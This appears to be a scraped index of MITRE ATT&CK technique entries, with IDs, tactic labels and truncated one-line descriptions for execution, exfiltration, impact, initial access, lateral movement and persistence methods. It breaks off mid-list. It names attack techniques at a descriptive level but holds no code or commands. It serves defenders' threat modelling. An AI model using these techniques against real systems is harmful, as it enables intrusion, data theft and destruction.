Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between …
T1559.003
Execution: XPC Services
Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, …
T1569
Execution: System Services
Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally …
T1569.001
Execution: Launchctl
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the …
T1569.002
Execution: Service Execution
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage …
T1569.003
Execution: Systemctl
Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked …
T1609
Execution: Container Administration Command
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API …
T1648
Execution: Serverless Execution
Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, …
T1651
Execution: Cloud Administration Command
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to …
T1674
Execution: Input Injection
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching …
T1675
Execution: ESXi Administration Command
Adversaries may abuse ESXi administration services to execute commands on guest machines hosted within an ESXi virtual environment. Persistent background services on ESXi-hosted VMs, such …
T1677
Execution: Poisoned Pipeline Execution
Adversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: …
T1002
Exfiltration: Data Compressed
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of …
T1011
Exfiltration: Exfiltration Over Other Network Medium
Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a …
T1011.001
Exfiltration: Exfiltration Over Bluetooth
Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet …
T1020
Exfiltration: Automated Exfiltration
Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) When automated …
T1020.001
Exfiltration: Traffic Duplication
Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used …
T1022
Exfiltration: Data Encrypted
Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous …
T1029
Exfiltration: Scheduled Transfer
Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic …
T1030
Exfiltration: Data Transfer Size Limits
An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used …
T1041
Exfiltration: Exfiltration Over C2 Channel
Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the …
T1048
Exfiltration: Exfiltration Over Alternative Protocol
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be …
T1048.001
Exfiltration: Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data …
T1048.002
Exfiltration: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data …
T1048.003
Exfiltration: Exfiltration Over Unencrypted Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. The data may …
T1052
Exfiltration: Exfiltration Over Physical Medium
Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration …
T1052.001
Exfiltration: Exfiltration over USB
Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via …
T1537
Exfiltration: Transfer Data to Cloud Account
Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the …
T1567
Exfiltration: Exfiltration Over Web Service
Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as …
T1567.001
Exfiltration: Exfiltration to Code Repository
Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API …
T1567.002
Exfiltration: Exfiltration to Cloud Storage
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, …
T1567.003
Exfiltration: Exfiltration to Text Storage Sites
Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used …
T1567.004
Exfiltration: Exfiltration Over Webhook
Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server …
T1485
Impact: Data Destruction
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. …
T1485.001
Impact: Lifecycle-Triggered Deletion
Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. Cloud storage buckets often allow users to set …
T1486
Impact: Data Encrypted for Impact
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They …
T1487
Impact: Disk Structure Wipe
Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot systems; targeting specific critical systems as well as a large …
T1488
Impact: Disk Content Wipe
Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to …
T1489
Impact: Service Stop
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or …
T1490
Impact: Inhibit System Recovery
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos …
T1491
Impact: Defacement
Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include …
T1491.001
Impact: Internal Defacement
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This …
T1491.002
Impact: External Defacement
An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) …
T1492
Impact: Stored Data Manipulation
Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony …
T1493
Impact: Transmitted Data Manipulation
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ …
T1494
Impact: Runtime Data Manipulation
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ …
T1495
Impact: Firmware Corruption
Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render …
T1496
Impact: Resource Hijacking
Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Resource hijacking may take a …
T1496.001
Impact: Compute Hijacking
Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. One common purpose for …
T1496.002
Impact: Bandwidth Hijacking
Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. Adversaries may also …
T1496.003
Impact: SMS Pumping
Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of …
T1496.004
Impact: Cloud Service Hijacking
Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. For example, adversaries may leverage email and messaging …
T1498
Impact: Network Denial of Service
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed …
T1498.001
Impact: Direct Network Flood
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high volume of network traffic to a target. This DoS attack may …
T1498.002
Impact: Reflection Amplification
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high volume of network traffic to a target. This type of Network DoS …
T1499
Impact: Endpoint Denial of Service
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by …
T1499.001
Impact: OS Exhaustion Flood
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources …
T1499.002
Impact: Service Exhaustion Flood
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and …
T1499.003
Impact: Application Exhaustion Flood
Adversaries may target resource-intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in …
T1499.004
Impact: Application or System Exploitation
Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some …
T1529
Impact: System Shutdown/Reboot
Adversaries may shut down/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot …
T1531
Impact: Account Access Removal
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated …
T1561
Impact: Disk Wipe
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network …
T1561.001
Impact: Disk Content Wipe
Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network …
T1561.002
Impact: Disk Structure Wipe
Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large …
T1565
Impact: Data Manipulation
Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant …
T1565.001
Impact: Stored Data Manipulation
Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: …
T1565.002
Impact: Transmitted Data Manipulation
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of …
T1565.003
Impact: Runtime Data Manipulation
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of …
T1657
Impact: Financial Theft
Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense …
T1667
Impact: Email Bombing
Adversaries may flood targeted email addresses with an overwhelming volume of messages. This may bury legitimate emails in a flood of spam and disrupt business …
T1189
Initial Access: Drive-by Compromise
Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. Multiple ways of delivering exploit code …
T1190
Initial Access: Exploit Public-Facing Application
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be …
T1192
Initial Access: Spearphishing Link
Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of …
T1193
Initial Access: Spearphishing Attachment
Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware …
T1194
Initial Access: Spearphishing via Service
Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third …
T1195
Initial Access: Supply Chain Compromise
Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain …
T1195.001
Initial Access: Compromise Software Dependencies and Development Tools
Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often …
T1195.002
Initial Access: Compromise Software Supply Chain
Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software …
T1195.003
Initial Access: Compromise Hardware Supply Chain
Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware …
T1199
Initial Access: Trusted Relationship
Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through a trusted third-party relationship abuses an existing connection that may …
T1200
Initial Access: Hardware Additions
Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to …
T1566
Initial Access: Phishing
Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known …
T1566.001
Initial Access: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of …
T1566.002
Initial Access: Spearphishing Link
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific …
T1566.003
Initial Access: Spearphishing via Service
Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of …
T1566.004
Initial Access: Spearphishing Voice
Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other …
T1659
Initial Access: Content Injection
Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious …
T1669
Initial Access: Wi-Fi Networks
Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target …
T1017
Lateral MovementApplication Deployment Software
Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary …
T1021
Lateral MovementRemote Services
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform …
T1021.001
Lateral MovementRemote Desktop Protocol
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on …
T1021.002
Lateral MovementSMB/Windows Admin Shares
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the …
T1021.003
Lateral MovementDistributed Component Object Model
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions …
T1021.004
Lateral MovementSSH
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user. SSH …
T1021.005
Lateral MovementVNC
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB …
T1021.006
Lateral MovementWindows Remote Management
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user. …
T1021.007
Lateral MovementCloud Services
Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The …
T1021.008
Lateral MovementDirect Cloud VM Connections
Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to …
T1051
Lateral MovementShared Webroot
**This technique has been deprecated and should no longer be used.** Adversaries may add malicious content to an internally accessible website through an open network …
T1075
Lateral MovementPass the Hash
Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication …
T1076
Lateral MovementRemote Desktop Protocol
Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user …
T1077
Lateral MovementWindows Admin Shares
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example …
T1080
Lateral MovementTaint Shared Content
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on …
T1091
Lateral MovementReplication Through Removable Media
Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when …
T1097
Lateral MovementPass the Ticket
Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can …
T1175
Lateral MovementComponent Object Model and Distributed COM
**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).** Adversaries may use the Windows Component Object Model (COM) and …
T1184
Lateral MovementSSH Hijacking
Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via …
T1210
Lateral Movement: Exploitation of Remote Services
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an …
T1534
Lateral Movement: Internal Spearphishing
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise …
T1563
Lateral Movement: Remote Service Session Hijacking
Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a …
T1563.001
Lateral Movement: SSH Hijacking
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on …
T1563.002
Lateral Movement: RDP Hijacking
Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It …
T1570
Lateral Movement: Lateral Tool Transfer
Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) files may …
T1004
Persistence: Winlogon Helper DLL
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows …
T1013
Persistence: Port Monitors
A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL …
T1015
Persistence: Accessibility Features
Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on …
T1019
Persistence: System Firmware
The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as …
T1023
Persistence: Shortcut Modification
Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed …
T1031
Persistence: Modify Existing Service
Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified …
T1034
Persistence: Path Interception
**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).** …
T1037
Persistence: Boot or Logon Initialization Scripts
Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.(Citation: Mandiant APT29 Eye Spy Email Nov 22)(Citation: Anomali Rocke March 2019) …
T1037.001
Persistence: Logon Script (Windows)
Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user …
T1037.002
Persistence: Login Hook
Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific …
T1037.003
Persistence: Network Logon Script
Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group …
T1037.004
Persistence: RC Scripts
Adversaries may establish persistence by modifying RC scripts, which are executed during a Unix-like system’s startup. These files allow system administrators to map and start …
T1037.005
Persistence: Startup Items
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and …
T1038
Persistence: DLL Search Order Hijacking
Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of …
T1042
Persistence: Change Default File Association
When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections …
T1044
Persistence: File System Permissions Weakness
Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing …
T1050
Persistence: New Service
When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, …
T1058
Persistence: Service Registry Permissions Weakness
Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a …
T1060
Persistence: Registry Run Keys / Startup Folder
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the …
T1062
Persistence: Hypervisor
**This technique has been deprecated and should no longer be used.** A type-1 hypervisor is a software layer that sits between the guest operating systems …
T1067
Persistence: Bootkit
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record …
T1084
Persistence: Windows Management Instrumentation Event Subscription
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may …
T1098
Persistence: Account Manipulation
Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access …
T1098.001
Persistence: Additional Cloud Credentials
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may …
T1098.002
Persistence: Additional Email Delegate Permissions
Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange …
T1098.003
Persistence: Additional Cloud Roles
An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update …
T1098.004
Persistence: SSH Authorized Keys
Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions, macOS, and ESXi hypervisors commonly use key-based authentication to …
T1098.005
Persistence: Device Registration
Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, …
T1098.006
Persistence: Additional Container Cluster Roles
An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For …
T1098.007
Persistence: Additional Local or Domain Groups
An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain. On Windows, accounts …
T1100
Persistence: Web Shell
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server …
T1101
Persistence: Security Support Provider
Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs …
T1103
Persistence: AppInit DLLs
Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every …
T1128
Persistence: Netsh Helper DLL
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to …
T1131
Persistence: Authentication Package
Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple …
T1133
Persistence: External Remote Services
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow …
T1136
Persistence: Create Account
Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may …
T1136.001
Persistence: Local Account
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote …
T1136.002
Persistence: Domain Account
Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and …
T1136.003
Persistence: Cloud Account
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish …
T1137
Persistence: Office Application Startup
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise …
T1137.001
Persistence: Office Template Macros
Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and …
T1137.002
Persistence: Office Test
Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows …
T1137.003
Persistence: Outlook Forms
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook …
T1137.004
Persistence: Outlook Home Page
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize …
T1137.005
Persistence: Outlook Rules
Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email …
T1137.006
Persistence: Add-ins
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: …
T1138
Persistence: Application Shimming
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. …
T1156
Persistence: Malicious Shell Modification
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session …
T1157
Persistence: Dylib Hijacking
macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries …
T1159
Persistence: Launch Agent
Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from …
T1160
Persistence: Launch Daemon
Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each …
T1161
Persistence: LC_LOAD_DYLIB Addition
Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O …
T1162
Persistence: Login Item
MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user's context, and …
T1163
Persistence: Rc.common
During the boot process, macOS executes <code>source /etc/rc.common</code>, which is a shell script containing various utility functions. This file also defines routines for processing command-line …
T1164
Persistence: Re-opened Applications
Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually …
T1165
Persistence: Startup Items
Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration …
T1168
Persistence: Local Job Scheduling
On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: …
T1176
Persistence: Software Extensions
Adversaries may abuse software extensions to establish persistent access to victim systems. Software extensions are modular components that enhance or customize the functionality of software …
T1176.001
Persistence: Browser Extensions
Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to …
T1176.002
Persistence: IDE Extensions
Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio …
T1179
Persistence: Hooking
Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link …
T1180
Persistence: Screensaver
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia …
T1182
Persistence: AppCert DLLs
Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application …
T1209
Persistence: Time Providers
The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time …
T1215
Persistence: Kernel Modules and Extensions
Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of …
T1501
Persistence: Systemd Service
Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also …
T1504
Persistence: PowerShell Profile
Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell …
T1505
Persistence: Server Software Component
Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to …
T1505.001
Persistence: SQL Stored Procedures
Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that …
T1505.002
Persistence: Transport Agent
Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport …
T1505.003
Persistence: Web Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on …
T1505.004
Persistence: IIS Components
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality …
T1505.005
Persistence: Terminal Services DLL
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server …
T1505.006
Persistence: vSphere Installation Bundles
Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual …
T1519
Persistence: Emond
Adversaries may use Event Monitor Daemon (emond) to establish persistence by scheduling malicious commands to run on predictable event triggers. Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1160) …
T1525
Persistence: Implant Internal Image
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine …
T1542.001
Persistence: System Firmware
Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) …
T1542.002
Persistence: Component Firmware
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will …
T1542.003
Persistence: Bootkit
Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious …
T1543
Persistence: Create or Modify System Process
Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes …
T1543.001
